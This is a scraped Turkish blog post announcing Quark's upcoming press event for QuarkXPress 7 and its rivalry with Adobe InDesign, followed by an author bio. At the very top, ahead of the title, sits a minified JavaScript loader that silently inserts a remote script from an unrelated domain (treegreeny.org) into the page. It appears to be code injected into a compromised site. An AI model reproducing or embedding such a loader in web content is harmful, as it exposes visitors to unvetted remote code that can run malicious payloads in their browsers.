;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ve Sonunda QuarkXPress 7 ... - elmasuyu.net
Kategoriler
Grafik Haber

Ve Sonunda QuarkXPress 7 …

Macworld İngiltere’nin yayınladığı bir habere göre son on yılın belki de masaüstü yayıncılığında konuşulan en ünlü yazılım firması Quark, 2 Haziran’da ünlü yazılımı QuarkXPress in 7. sürümünü tanıtmak üzere bir basın toplantısı verecek. Yazılımın 7. sürümünün şirketi eski durumuna geri getirip getirmeyeceği henüz belli değil. Bayrağı tekrar alabilecek mi sorusu birçok kullanıcı tarafından merakla beklenen bir soru. Son yıllarda Adobe’nin Indesign’ı ile rekabete giren XPress yeniliklere ayak uyduramadığı için Indesign’ın gerisinde kalmıştı. Program piyasaya çıktığında yenilikleri sizinle paylaşacağız.

Yazar Cem YENER

ElmaSuyu.Net Yöneticisi - Site faaliyetlerinin yanında bilgisayar dünyası ile yakından ilgili. Mac ve iOS özellikle ilgilendi konulardır.
Üniversite Program Koordinatörü - Bir devlet üniversitesinin İngilizce Hazırlık Programı Koordinatörü ve Akademik Direktörlüğünü yürütmekte.
@jamwinner